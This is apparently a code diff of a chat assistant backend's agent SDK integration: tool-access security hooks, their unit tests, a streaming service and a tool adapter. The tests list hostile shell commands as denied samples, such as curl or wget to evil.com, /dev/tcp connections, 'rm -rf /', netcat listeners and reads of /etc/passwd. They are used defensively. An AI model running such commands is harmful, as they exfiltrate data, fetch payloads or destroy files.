        return _deny(
            f"Tool '{tool_name}' is not available. "
            "Use the CoPilot-specific tools instead."
        )

    # Sandboxed Bash: only allowlisted commands, workspace-scoped paths
    if tool_name in SANDBOXED_BASH_TOOLS:
        return _validate_bash_command(tool_input, sdk_cwd)

    # Workspace-scoped tools: allowed only within the SDK workspace directory
    if tool_name in WORKSPACE_SCOPED_TOOLS:
        return _validate_workspace_path(tool_name, tool_input, sdk_cwd)

    # Check for dangerous patterns in tool input
    # Use json.dumps for predictable format (str() produces Python repr)
    input_str = json.dumps(tool_input) if tool_input else ""

    for pattern in DANGEROUS_PATTERNS:
        if re.search(pattern, input_str, re.IGNORECASE):
            logger.warning(
                f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
            )
            return _deny("Input contains blocked pattern")

    return {}


def _validate_user_isolation(
    tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
    """Validate that tool calls respect user isolation."""
    # For workspace file tools, ensure path doesn't escape
    if "workspace" in tool_name.lower():
        path = tool_input.get("path", "") or tool_input.get("file_path", "")
        if path:
            # Check for path traversal
            if ".." in path or path.startswith("/"):
                logger.warning(
                    f"Blocked path traversal attempt: {path} by user {user_id}"
                )
                return {
                    "hookSpecificOutput": {
                        "hookEventName": "PreToolUse",
                        "permissionDecision": "deny",
                        "permissionDecisionReason": "Path traversal not allowed",
                    }
                }

    return {}


def create_security_hooks(
    user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
    """Create the security hooks configuration for Claude Agent SDK.

    Includes security validation and observability hooks:
    - PreToolUse: Security validation before tool execution
    - PostToolUse: Log successful tool executions
    - PostToolUseFailure: Log and handle failed tool executions
    - PreCompact: Log context compaction events (SDK handles compaction automatically)

    Args:
        user_id: Current user ID for isolation validation
        sdk_cwd: SDK working directory for workspace-scoped tool validation

    Returns:
        Hooks configuration dict for ClaudeAgentOptions
    """
    try:
        from claude_agent_sdk import HookMatcher
        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput

        async def pre_tool_use_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Combined pre-tool-use validation hook."""
            _ = context  # unused but required by signature
            tool_name = cast(str, input_data.get("tool_name", ""))
            tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))

            # Strip MCP prefix for consistent validation
            is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
            clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)

            # Only block non-CoPilot tools; our MCP-registered tools
            # (including Read for oversized results) are already sandboxed.
            if not is_copilot_tool:
                result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
                if result:
                    return cast(SyncHookJSONOutput, result)

            # Validate user isolation
            result = _validate_user_isolation(clean_name, tool_input, user_id)
            if result:
                return cast(SyncHookJSONOutput, result)

            logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
            return cast(SyncHookJSONOutput, {})

        async def post_tool_use_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Log successful tool executions for observability."""
            _ = context
            tool_name = cast(str, input_data.get("tool_name", ""))
            logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
            return cast(SyncHookJSONOutput, {})

        async def post_tool_failure_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Log failed tool executions for debugging."""
            _ = context
            tool_name = cast(str, input_data.get("tool_name", ""))
            error = input_data.get("error", "Unknown error")
            logger.warning(
                f"[SDK] Tool failed: {tool_name}, error={error}, "
                f"user={user_id}, tool_use_id={tool_use_id}"
            )
            return cast(SyncHookJSONOutput, {})

        async def pre_compact_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Log when SDK triggers context compaction.

            The SDK automatically compacts conversation history when it grows too large.
            This hook provides visibility into when compaction happens.
            """
            _ = context, tool_use_id
            trigger = input_data.get("trigger", "auto")
            logger.info(
                f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
            )
            return cast(SyncHookJSONOutput, {})

        return {
            "PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
            "PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
            "PostToolUseFailure": [
                HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
            ],
            "PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
        }
    except ImportError:
        # Fallback for when SDK isn't available - return empty hooks
        logger.warning("claude-agent-sdk not available, security hooks disabled")
        return {}
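
A short sketch of the allow/deny contract, using the module-level validators
above; the commands are illustrative. An empty dict means "allow", while a
denial carries the PreToolUse hookSpecificOutput payload built by _deny().

verdict = _validate_tool_access("Bash", {"command": "curl https://example.com"})
assert verdict["hookSpecificOutput"]["permissionDecision"] == "deny"

verdict = _validate_tool_access(
    "Bash", {"command": "jq '.a' data.json"}, sdk_cwd="/tmp/copilot-demo"
)
assert verdict == {}  # jq is allowlisted and no path leaves the workspace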
@@ -1,258 +0,0 @@
"""Unit tests for SDK security hooks."""

import os

from .security_hooks import _validate_tool_access, _validate_user_isolation

SDK_CWD = "/tmp/copilot-abc123"


def _is_denied(result: dict) -> bool:
    hook = result.get("hookSpecificOutput", {})
    return hook.get("permissionDecision") == "deny"


# -- Blocked tools -----------------------------------------------------------


def test_blocked_tools_denied():
    for tool in ("bash", "shell", "exec", "terminal", "command"):
        result = _validate_tool_access(tool, {})
        assert _is_denied(result), f"{tool} should be blocked"


def test_unknown_tool_allowed():
    result = _validate_tool_access("SomeCustomTool", {})
    assert result == {}


# -- Workspace-scoped tools --------------------------------------------------


def test_read_within_workspace_allowed():
    result = _validate_tool_access(
        "Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
    )
    assert result == {}


def test_write_within_workspace_allowed():
    result = _validate_tool_access(
        "Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
    )
    assert result == {}


def test_edit_within_workspace_allowed():
    result = _validate_tool_access(
        "Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
    )
    assert result == {}


def test_glob_within_workspace_allowed():
    result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_grep_within_workspace_allowed():
    result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_read_outside_workspace_denied():
    result = _validate_tool_access(
        "Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_write_outside_workspace_denied():
    result = _validate_tool_access(
        "Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_traversal_attack_denied():
    result = _validate_tool_access(
        "Read",
        {"file_path": f"{SDK_CWD}/../../etc/passwd"},
        sdk_cwd=SDK_CWD,
    )
    assert _is_denied(result)


def test_no_path_allowed():
    """Glob/Grep without a path argument defaults to cwd — should pass."""
    result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_read_no_cwd_denies_absolute():
    """If no sdk_cwd is set, absolute paths are denied."""
    result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
    assert _is_denied(result)


# -- Tool-results directory --------------------------------------------------


def test_read_tool_results_allowed():
    home = os.path.expanduser("~")
    path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_read_claude_projects_without_tool_results_denied():
    home = os.path.expanduser("~")
    path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
    assert _is_denied(result)


# -- Sandboxed Bash ----------------------------------------------------------


def test_bash_safe_commands_allowed():
    """Allowed data-processing commands should pass."""
    safe_commands = [
        "jq '.blocks' result.json",
        "head -20 output.json",
        "tail -n 50 data.txt",
        "cat file.txt | grep 'pattern'",
        "wc -l file.txt",
        "sort data.csv | uniq",
        "grep -i 'error' log.txt | head -10",
        "find . -name '*.json'",
        "ls -la",
        "echo hello",
        "cut -d',' -f1 data.csv | sort | uniq -c",
        "jq '.blocks[] | .id' result.json",
        "sed -n '10,20p' file.txt",
        "awk '{print $1}' data.txt",
    ]
    for cmd in safe_commands:
        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
        assert result == {}, f"Safe command should be allowed: {cmd}"


def test_bash_dangerous_commands_denied():
    """Non-allowlisted commands should be denied."""
    dangerous = [
        "curl https://evil.com",
        "wget https://evil.com/payload",
        "rm -rf /",
        "python -c 'import os; os.system(\"ls\")'",
        "ssh user@host",
        "nc -l 4444",
        "apt install something",
        "pip install malware",
        "chmod 777 file.txt",
        "kill -9 1",
    ]
    for cmd in dangerous:
        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
        assert _is_denied(result), f"Dangerous command should be denied: {cmd}"


def test_bash_command_substitution_denied():
    result = _validate_tool_access(
        "Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_backtick_substitution_denied():
    result = _validate_tool_access(
        "Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_output_redirect_denied():
    result = _validate_tool_access(
        "Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_dev_tcp_denied():
    result = _validate_tool_access(
        "Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_pipe_to_dangerous_denied():
    """Even if the first command is safe, piped commands must also be safe."""
    result = _validate_tool_access(
        "Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_path_outside_workspace_denied():
    result = _validate_tool_access(
        "Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_path_within_workspace_allowed():
    result = _validate_tool_access(
        "Bash",
        {"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
        sdk_cwd=SDK_CWD,
    )
    assert result == {}


def test_bash_empty_command_denied():
    result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
    assert _is_denied(result)


# -- Dangerous patterns ------------------------------------------------------


def test_dangerous_pattern_blocked():
    result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
    assert _is_denied(result)


def test_subprocess_pattern_blocked():
    result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
    assert _is_denied(result)


# -- User isolation ----------------------------------------------------------


def test_workspace_path_traversal_blocked():
    result = _validate_user_isolation(
        "workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
    )
    assert _is_denied(result)


def test_workspace_absolute_path_blocked():
    result = _validate_user_isolation(
        "workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
    )
    assert _is_denied(result)


def test_workspace_normal_path_allowed():
    result = _validate_user_isolation(
        "workspace_read", {"path": "src/main.py"}, user_id="user-1"
    )
    assert result == {}


def test_non_workspace_tool_passes_isolation():
    result = _validate_user_isolation(
        "find_agent", {"query": "email"}, user_id="user-1"
    )
    assert result == {}
@@ -1,497 +0,0 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""

import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any

from backend.util.exceptions import NotFoundError

from ..config import ChatConfig
from ..model import (
    ChatMessage,
    ChatSession,
    get_chat_session,
    update_session_title,
    upsert_chat_session,
)
from ..response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
    StreamStart,
    StreamTextDelta,
    StreamToolInputAvailable,
    StreamToolOutputAvailable,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
    COPILOT_TOOL_NAMES,
    create_copilot_mcp_server,
    set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks

logger = logging.getLogger(__name__)
config = ChatConfig()

# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()


_SDK_CWD_PREFIX = "/tmp/copilot-"

# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """

## Bash restrictions

The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""


def _make_sdk_cwd(session_id: str) -> str:
    """Create a safe, session-specific working directory path.

    Sanitizes session_id, then validates the resulting path stays under /tmp/
    using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
    """
    # Step 1: Sanitize - only allow alphanumeric and hyphens
    safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
    if not safe_id:
        raise ValueError("Session ID is empty after sanitization")

    # Step 2: Construct path with known-safe prefix
    cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")

    # Step 3: Validate the path is still under our prefix (prevent traversal)
    if not cwd.startswith(_SDK_CWD_PREFIX):
        raise ValueError(f"Session path escaped prefix: {cwd}")

    # Step 4: Additional assertion for defense-in-depth
    assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"

    return cwd
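
Worked examples of the sanitization above (the session IDs are made up):

assert _make_sdk_cwd("abc-123") == "/tmp/copilot-abc-123"
# Traversal characters are stripped before the path is ever built:
assert _make_sdk_cwd("../../etc") == "/tmp/copilot-etc"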
def _cleanup_sdk_tool_results(cwd: str) -> None:
    """Remove SDK tool-result files for a specific session working directory.

    The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
    We clean only the specific cwd's results to avoid race conditions between
    concurrent sessions.

    Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
    """
    import shutil

    # Security check 1: Validate cwd is under the expected prefix
    normalized = os.path.normpath(cwd)
    if not normalized.startswith(_SDK_CWD_PREFIX):
        logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
        return

    # Security check 2: Ensure no path traversal in the normalized path
    if ".." in normalized:
        logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
        return

    # SDK encodes the cwd path by replacing '/' with '-'
    encoded_cwd = normalized.replace("/", "-")

    # Construct the project directory path (known-safe home expansion)
    claude_projects = os.path.expanduser("~/.claude/projects")
    project_dir = os.path.join(claude_projects, encoded_cwd)

    # Security check 3: Validate project_dir is under ~/.claude/projects
    project_dir = os.path.normpath(project_dir)
    if not project_dir.startswith(claude_projects):
        logger.warning(
            f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
        )
        return

    results_dir = os.path.join(project_dir, "tool-results")
    if os.path.isdir(results_dir):
        for filename in os.listdir(results_dir):
            file_path = os.path.join(results_dir, filename)
            try:
                if os.path.isfile(file_path):
                    os.remove(file_path)
            except OSError:
                pass

    # Also clean up the temp cwd directory itself
    try:
        shutil.rmtree(normalized, ignore_errors=True)
    except OSError:
        pass
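
A small worked example of the cwd encoding used above (paths illustrative):

cwd = "/tmp/copilot-abc123"
encoded = cwd.replace("/", "-")  # "-tmp-copilot-abc123"
# So cleanup targets ~/.claude/projects/-tmp-copilot-abc123/tool-results/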
async def _compress_conversation_history(
    session: ChatSession,
) -> list[ChatMessage]:
    """Compress prior conversation messages if they exceed the token threshold.

    Uses the shared compress_context() from prompt.py which supports:
    - LLM summarization of old messages (keeps recent ones intact)
    - Progressive content truncation as fallback
    - Middle-out deletion as last resort

    Returns the compressed prior messages (everything except the current message).
    """
    prior = session.messages[:-1]
    if len(prior) < 2:
        return prior

    from backend.util.prompt import compress_context

    # Convert ChatMessages to dicts for compress_context
    messages_dict = []
    for msg in prior:
        msg_dict: dict[str, Any] = {"role": msg.role}
        if msg.content:
            msg_dict["content"] = msg.content
        if msg.tool_calls:
            msg_dict["tool_calls"] = msg.tool_calls
        if msg.tool_call_id:
            msg_dict["tool_call_id"] = msg.tool_call_id
        messages_dict.append(msg_dict)

    try:
        import openai

        async with openai.AsyncOpenAI(
            api_key=config.api_key, base_url=config.base_url, timeout=30.0
        ) as client:
            result = await compress_context(
                messages=messages_dict,
                model=config.model,
                client=client,
            )
    except Exception as e:
        logger.warning(f"[SDK] Context compression with LLM failed: {e}")
        # Fall back to truncation-only (no LLM summarization)
        result = await compress_context(
            messages=messages_dict,
            model=config.model,
            client=None,
        )

    if result.was_compacted:
        logger.info(
            f"[SDK] Context compacted: {result.original_token_count} -> "
            f"{result.token_count} tokens "
            f"({result.messages_summarized} summarized, "
            f"{result.messages_dropped} dropped)"
        )
        # Convert compressed dicts back to ChatMessages
        return [
            ChatMessage(
                role=m["role"],
                content=m.get("content"),
                tool_calls=m.get("tool_calls"),
                tool_call_id=m.get("tool_call_id"),
            )
            for m in result.messages
        ]

    return prior


def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
    """Format conversation messages into a context prefix for the user message.

    Returns a string like:
        <conversation_history>
        User: hello
        You responded: Hi! How can I help?
        </conversation_history>

    Returns None if there are no messages to format.
    """
    if not messages:
        return None

    lines: list[str] = []
    for msg in messages:
        if not msg.content:
            continue
        if msg.role == "user":
            lines.append(f"User: {msg.content}")
        elif msg.role == "assistant":
            lines.append(f"You responded: {msg.content}")
        # Skip tool messages — they're internal details

    if not lines:
        return None

    return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
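
A small worked example of the context prefix (the messages are made up):

history = [
    ChatMessage(role="user", content="hello"),
    ChatMessage(role="assistant", content="Hi! How can I help?"),
]
print(_format_conversation_context(history))
# <conversation_history>
# User: hello
# You responded: Hi! How can I help?
# </conversation_history>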
async def stream_chat_completion_sdk(
    session_id: str,
    message: str | None = None,
    tool_call_response: str | None = None,  # noqa: ARG001
    is_user_message: bool = True,
    user_id: str | None = None,
    retry_count: int = 0,  # noqa: ARG001
    session: ChatSession | None = None,
    context: dict[str, str] | None = None,  # noqa: ARG001
) -> AsyncGenerator[StreamBaseResponse, None]:
    """Stream chat completion using Claude Agent SDK.

    Drop-in replacement for stream_chat_completion with improved reliability.
    """

    if session is None:
        session = await get_chat_session(session_id, user_id)

    if not session:
        raise NotFoundError(
            f"Session {session_id} not found. Please create a new session first."
        )

    if message:
        session.messages.append(
            ChatMessage(
                role="user" if is_user_message else "assistant", content=message
            )
        )
        if is_user_message:
            track_user_message(
                user_id=user_id, session_id=session_id, message_length=len(message)
            )

    session = await upsert_chat_session(session)

    # Generate title for new sessions (first user message)
    if is_user_message and not session.title:
        user_messages = [m for m in session.messages if m.role == "user"]
        if len(user_messages) == 1:
            first_message = user_messages[0].content or message or ""
            if first_message:
                task = asyncio.create_task(
                    _update_title_async(session_id, first_message, user_id)
                )
                _background_tasks.add(task)
                task.add_done_callback(_background_tasks.discard)

    # Build system prompt (reuses non-SDK path with Langfuse support)
    has_history = len(session.messages) > 1
    system_prompt, _ = await _build_system_prompt(
        user_id, has_conversation_history=has_history
    )
    system_prompt += _SDK_TOOL_SUPPLEMENT
    message_id = str(uuid.uuid4())
    text_block_id = str(uuid.uuid4())
    task_id = str(uuid.uuid4())

    yield StreamStart(messageId=message_id, taskId=task_id)

    stream_completed = False
    # Use a session-specific temp dir to avoid cleanup race conditions
    # between concurrent sessions.
    sdk_cwd = _make_sdk_cwd(session_id)
    os.makedirs(sdk_cwd, exist_ok=True)

    set_execution_context(user_id, session, None)

    try:
        try:
            from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient

            mcp_server = create_copilot_mcp_server()

            # Initialize Langfuse tracing (no-op if not configured)
            tracer = TracedSession(session_id, user_id, system_prompt)

            # Merge security hooks with optional tracing hooks
            security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
            tracing_hooks = create_tracing_hooks(tracer)
            combined_hooks = merge_hooks(security_hooks, tracing_hooks)

            options = ClaudeAgentOptions(
                system_prompt=system_prompt,
                mcp_servers={"copilot": mcp_server},  # type: ignore[arg-type]
                allowed_tools=COPILOT_TOOL_NAMES,
                hooks=combined_hooks,  # type: ignore[arg-type]
                cwd=sdk_cwd,
                max_buffer_size=config.sdk_max_buffer_size,
            )

            adapter = SDKResponseAdapter(message_id=message_id)
            adapter.set_task_id(task_id)

            async with tracer, ClaudeSDKClient(options=options) as client:
                current_message = message or ""
                if not current_message and session.messages:
                    last_user = [m for m in session.messages if m.role == "user"]
                    if last_user:
                        current_message = last_user[-1].content or ""

                if not current_message.strip():
                    yield StreamError(
                        errorText="Message cannot be empty.",
                        code="empty_prompt",
                    )
                    yield StreamFinish()
                    return

                # Build query with conversation history context.
                # Compress history first to handle long conversations.
                query_message = current_message
                if len(session.messages) > 1:
                    compressed = await _compress_conversation_history(session)
                    history_context = _format_conversation_context(compressed)
                    if history_context:
                        query_message = (
                            f"{history_context}\n\n"
                            f"Now, the user says:\n{current_message}"
                        )

                logger.info(
                    f"[SDK] Sending query: {current_message[:80]!r}"
                    f" ({len(session.messages)} msgs in session)"
                )
                tracer.log_user_message(current_message)
                await client.query(query_message, session_id=session_id)

                assistant_response = ChatMessage(role="assistant", content="")
                accumulated_tool_calls: list[dict[str, Any]] = []
                has_appended_assistant = False
                has_tool_results = False

                async for sdk_msg in client.receive_messages():
                    logger.debug(
                        f"[SDK] Received: {type(sdk_msg).__name__} "
                        f"{getattr(sdk_msg, 'subtype', '')}"
                    )
                    tracer.log_sdk_message(sdk_msg)
                    for response in adapter.convert_message(sdk_msg):
                        if isinstance(response, StreamStart):
                            continue
                        yield response

                        if isinstance(response, StreamTextDelta):
                            delta = response.delta or ""
                            # After tool results, start a new assistant
                            # message for the post-tool text.
                            if has_tool_results and has_appended_assistant:
                                assistant_response = ChatMessage(
|
|
||||||
role="assistant", content=delta
|
|
||||||
)
|
|
||||||
accumulated_tool_calls = []
|
|
||||||
has_appended_assistant = False
|
|
||||||
has_tool_results = False
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
has_appended_assistant = True
|
|
||||||
else:
|
|
||||||
assistant_response.content = (
|
|
||||||
assistant_response.content or ""
|
|
||||||
) + delta
|
|
||||||
if not has_appended_assistant:
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
has_appended_assistant = True
|
|
||||||
|
|
||||||
elif isinstance(response, StreamToolInputAvailable):
|
|
||||||
accumulated_tool_calls.append(
|
|
||||||
{
|
|
||||||
"id": response.toolCallId,
|
|
||||||
"type": "function",
|
|
||||||
"function": {
|
|
||||||
"name": response.toolName,
|
|
||||||
"arguments": json.dumps(response.input or {}),
|
|
||||||
},
|
|
||||||
}
|
|
||||||
)
|
|
||||||
assistant_response.tool_calls = accumulated_tool_calls
|
|
||||||
if not has_appended_assistant:
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
has_appended_assistant = True
|
|
||||||
|
|
||||||
elif isinstance(response, StreamToolOutputAvailable):
|
|
||||||
session.messages.append(
|
|
||||||
ChatMessage(
|
|
||||||
role="tool",
|
|
||||||
content=(
|
|
||||||
response.output
|
|
||||||
if isinstance(response.output, str)
|
|
||||||
else str(response.output)
|
|
||||||
),
|
|
||||||
tool_call_id=response.toolCallId,
|
|
||||||
)
|
|
||||||
)
|
|
||||||
has_tool_results = True
|
|
||||||
|
|
||||||
elif isinstance(response, StreamFinish):
|
|
||||||
stream_completed = True
|
|
||||||
|
|
||||||
if stream_completed:
|
|
||||||
break
|
|
||||||
|
|
||||||
if (
|
|
||||||
assistant_response.content or assistant_response.tool_calls
|
|
||||||
) and not has_appended_assistant:
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
|
|
||||||
except ImportError:
|
|
||||||
logger.warning(
|
|
||||||
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
|
|
||||||
)
|
|
||||||
async for response in stream_with_anthropic(
|
|
||||||
session, system_prompt, text_block_id
|
|
||||||
):
|
|
||||||
if isinstance(response, StreamFinish):
|
|
||||||
stream_completed = True
|
|
||||||
yield response
|
|
||||||
|
|
||||||
await upsert_chat_session(session)
|
|
||||||
logger.debug(
|
|
||||||
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
|
|
||||||
)
|
|
||||||
if not stream_completed:
|
|
||||||
yield StreamFinish()
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.error(f"[SDK] Error: {e}", exc_info=True)
|
|
||||||
try:
|
|
||||||
await upsert_chat_session(session)
|
|
||||||
except Exception as save_err:
|
|
||||||
logger.error(f"[SDK] Failed to save session on error: {save_err}")
|
|
||||||
yield StreamError(
|
|
||||||
errorText="An error occurred. Please try again.",
|
|
||||||
code="sdk_error",
|
|
||||||
)
|
|
||||||
yield StreamFinish()
|
|
||||||
finally:
|
|
||||||
_cleanup_sdk_tool_results(sdk_cwd)
|
|
||||||
|
|
||||||
|
|
||||||
async def _update_title_async(
|
|
||||||
session_id: str, message: str, user_id: str | None = None
|
|
||||||
) -> None:
|
|
||||||
"""Background task to update session title."""
|
|
||||||
try:
|
|
||||||
title = await _generate_session_title(
|
|
||||||
message, user_id=user_id, session_id=session_id
|
|
||||||
)
|
|
||||||
if title:
|
|
||||||
await update_session_title(session_id, title)
|
|
||||||
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
|
|
||||||
except Exception as e:
|
|
||||||
logger.warning(f"[SDK] Failed to update session title: {e}")
|
|
||||||
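
# Editor's sketch (illustrative values only): how the history prefix and the
# new user message compose into the single query string passed to
# client.query() above.
#
#     history_context = (
#         "<conversation_history>\n"
#         "User: hello\n"
#         "You responded: Hi! How can I help?\n"
#         "</conversation_history>"
#     )
#     current_message = "Now build me a news-summary agent"
#     query_message = f"{history_context}\n\nNow, the user says:\n{current_message}"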
@@ -1,321 +0,0 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.

This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""

import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any

from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool

logger = logging.getLogger(__name__)

# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")

# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"

# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
    "current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
    "current_tool_call_id", default=None
)

# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
    "pending_tool_outputs", default=None  # type: ignore[arg-type]
)


def set_execution_context(
    user_id: str | None,
    session: ChatSession,
    tool_call_id: str | None = None,
) -> None:
    """Set the execution context for tool calls.

    This must be called before streaming begins to ensure tools have access
    to user_id and session information.
    """
    _current_user_id.set(user_id)
    _current_session.set(session)
    _current_tool_call_id.set(tool_call_id)
    _pending_tool_outputs.set({})


def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
    """Get the current execution context."""
    return (
        _current_user_id.get(),
        _current_session.get(),
        _current_tool_call_id.get(),
    )


def pop_pending_tool_output(tool_name: str) -> str | None:
    """Pop and return the stashed full output for *tool_name*.

    The SDK CLI may truncate large tool results (writing them to disk and
    replacing the content with a file reference). This stash keeps the
    original MCP output so the response adapter can forward it to the
    frontend for proper widget rendering.

    Returns ``None`` if nothing was stashed for *tool_name*.
    """
    pending = _pending_tool_outputs.get(None)
    if pending is None:
        return None
    return pending.pop(tool_name, None)
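
# Editor's sketch of the stash round trip (hypothetical tool name; assumes
# set_execution_context has already initialized _pending_tool_outputs, as it
# does before streaming begins):
#
#     _pending_tool_outputs.get()["find_block"] = '{"blocks": [...]}'
#     assert pop_pending_tool_output("find_block") == '{"blocks": [...]}'
#     assert pop_pending_tool_output("find_block") is None  # consumed once, then gone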


def create_tool_handler(base_tool: BaseTool):
    """Create an async handler function for a BaseTool.

    This wraps the existing BaseTool._execute method to be compatible
    with the Claude Agent SDK MCP tool format.
    """

    async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
        """Execute the wrapped tool and return MCP-formatted response."""
        user_id, session, tool_call_id = get_execution_context()

        if session is None:
            return {
                "content": [
                    {
                        "type": "text",
                        "text": json.dumps(
                            {
                                "error": "No session context available",
                                "type": "error",
                            }
                        ),
                    }
                ],
                "isError": True,
            }

        try:
            # Call the existing tool's execute method
            # Generate unique tool_call_id per invocation for proper correlation
            effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
            result = await base_tool.execute(
                user_id=user_id,
                session=session,
                tool_call_id=effective_id,
                **args,
            )

            # The result is a StreamToolOutputAvailable, extract the output
            text = (
                result.output
                if isinstance(result.output, str)
                else json.dumps(result.output)
            )

            # Stash the full output before the SDK potentially truncates it.
